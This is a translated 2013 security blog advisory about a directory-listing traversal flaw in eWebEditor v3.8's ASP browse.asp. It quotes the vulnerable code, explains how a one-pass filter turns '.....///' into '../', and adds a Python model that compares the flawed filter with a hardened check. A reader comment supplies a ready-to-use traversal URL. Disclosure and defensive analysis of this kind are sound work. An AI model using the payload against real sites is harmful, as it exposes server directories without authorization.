eWebEditor v3.8 Directory Listing Vulnerability [ASP version]

Title: ASP eWebEditor v3.8 directory listing vulnerability (other versions untested)
Vulnerable file: asp/browse.asp
Cause of the vulnerability:

Sub InitParam()
        sType = UCase(Trim(Request.QueryString("type")))
        sStyleName = Trim(Request.QueryString("style"))
        sCusDir = Trim(Request.QueryString("cusdir"))
        Dim i, aStyleConfig, bValidStyle
        bValidStyle = False
        For i = 1 To Ubound(aStyle)
                aStyleConfig = Split(aStyle(i), "|||")
                If Lcase(sStyleName) = Lcase(aStyleConfig(0)) Then
                        bValidStyle = True
                        Exit For
                End If
        Next
        If bValidStyle = False Then
                OutScript("alert('Invalid Style.')")
        End If
        sBaseUrl = aStyleConfig(19)
        nAllowBrowse = CLng(aStyleConfig(43))
        nCusDirFlag = Clng(aStyleConfig(61))
        If nAllowBrowse <> 1 Then
                OutScript("alert('Do not allow browse!')")
        End If
        If nCusDirFlag <> 1 Then
                sCusDir = ""
        Else
                sCusDir = Replace(sCusDir, "\", "/")
                If Left(sCusDir, 1) = "/" Or Left(sCusDir, 1) = "." Or Right(sCusDir, 1) = "." Or InStr(sCusDir, "./") > 0 Or InStr(sCusDir, "/.") > 0 Or InStr(sCusDir, "//") > 0 Then
                        sCusDir = ""
                Else
                        If Right(sCusDir, 1) <> "/" Then
                                sCusDir = sCusDir & "/"
                        End If
                End If
        End If
        sUploadDir = aStyleConfig(3)
        If Left(sUploadDir, 1) <> "/" Then
                sUploadDir = "../" & sUploadDir
        End If
        Select Case sBaseUrl
        Case "0"
                sContentPath = aStyleConfig(23)
        Case "1"
                sContentPath = RelativePath2RootPath(sUploadDir)
        Case "2"
                sContentPath = RootPath2DomainPath(RelativePath2RootPath(sUploadDir))
        End Select
        sUploadDir = sUploadDir & sCusDir
        sContentPath = sContentPath & sCusDir
        Select Case sType
        Case "FILE"
                sAllowExt = ""
        Case "MEDIA"
                sAllowExt = "rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov"
        Case "FLASH"
                sAllowExt = "swf"
        Case Else
                sAllowExt = "bmp|jpg|jpeg|png|gif"
        End Select
        sCurrDir = sUploadDir
        sDir = Trim(Request("dir"))
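'1. Suppose dir = ../
'2. Suppose dir = ...//
'3. Suppose dir = .....///
        sDir = Replace(sDir, "\", "/")  'Filter 1
        sDir = Replace(sDir, "../", "") 'Filter 2
'Input 1 is filtered out at this point
        sDir = Replace(sDir, "./", "") 'Filter 3
'Input 2 is also filtered out at this point
'Input 3 becomes ../ at this point. A rather interesting bypass! Quite a few CMSes seem to filter this way.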
        If sDir <> "" Then
                If CheckValidDir(Server.Mappath(sUploadDir & sDir)) = True Then
                        sCurrDir = sUploadDir & sDir & "/"
                Else
                        sDir = ""
                End If
        End If
End Sub

Vulnerability found by: 鬼哥
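
Added example (not part of the original post or of eWebEditor's code): a Python model of the three Replace passes applied to `dir`, showing how single-pass removal lets `.....///` collapse into `../`, next to a check that rejects dot-only segments and verifies containment. The function names and the upload root `/site/ewebeditor/uploadfile` are assumptions made for illustration, and the model ignores `CheckValidDir`.

```python
import posixpath
from typing import Optional

UPLOAD_ROOT = "/site/ewebeditor/uploadfile"  # constructed path (assumption)

def legacy_filter(s_dir: str) -> str:
    """Model of the three Replace() passes browse.asp applies to `dir`."""
    s_dir = s_dir.replace("\\", "/")  # filter 1
    s_dir = s_dir.replace("../", "")  # filter 2: one pass, no re-scan
    s_dir = s_dir.replace("./", "")   # filter 3: can rebuild "../" from leftovers
    return s_dir

def legacy_resolve(s_dir: str) -> str:
    """Directory the legacy logic would list (sUploadDir & sDir, normalized)."""
    return posixpath.normpath(posixpath.join(UPLOAD_ROOT, legacy_filter(s_dir)))

def is_inside_root(path: str) -> bool:
    """True if path is the upload root itself or lies below it."""
    return path == UPLOAD_ROOT or path.startswith(UPLOAD_ROOT + "/")

def safe_resolve(s_dir: str) -> Optional[str]:
    """Reject suspicious input instead of rewriting it, then verify containment."""
    s_dir = s_dir.replace("\\", "/")
    if s_dir.startswith("/") or ":" in s_dir or "\x00" in s_dir:
        return None  # absolute path, drive letter or NUL byte
    parts = [p for p in s_dir.split("/") if p]
    if any(p.strip(".") == "" for p in parts):
        return None  # ".", "..", "....." and other dot-only segments
    full = posixpath.normpath(posixpath.join(UPLOAD_ROOT, *parts))
    return full if is_inside_root(full) else None

if __name__ == "__main__":
    # The three inputs from the post's code comments, plus an ordinary subfolder.
    for sample in ["../", "...//", ".....///", "images/2013"]:
        print(repr(sample), "->", repr(legacy_filter(sample)),
              "| legacy:", legacy_resolve(sample),
              "| hardened:", safe_resolve(sample))
```

Python's `str.replace` makes one left-to-right, non-overlapping pass, which matches the VBScript `Replace` behaviour the post relies on for these inputs.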

Permalink: https://www.unhonker.com/bug/1236.html | 90' s Blog | Focusing on network information security

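This entry was posted by unhonker on May 27, 2013 under the Vulnerability Disclosure category. You may leave a comment, and you may quote it on your own site or blog provided the original URL and author are retained.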

eWebEditor v3.8 Directory Listing Vulnerability [ASP version]: 2 comments so far

  1. First comment
    草哲:

    Attack code example:
    http://localhost/asp/browse.asp?action=file&type=file&dir=…..///DiaLog&style=full650&cusdir=&foldertype=upload&returnflag=span_upload
    Jumps up into eWebEditor's DiaLog directory

    2013-05-27 21:56
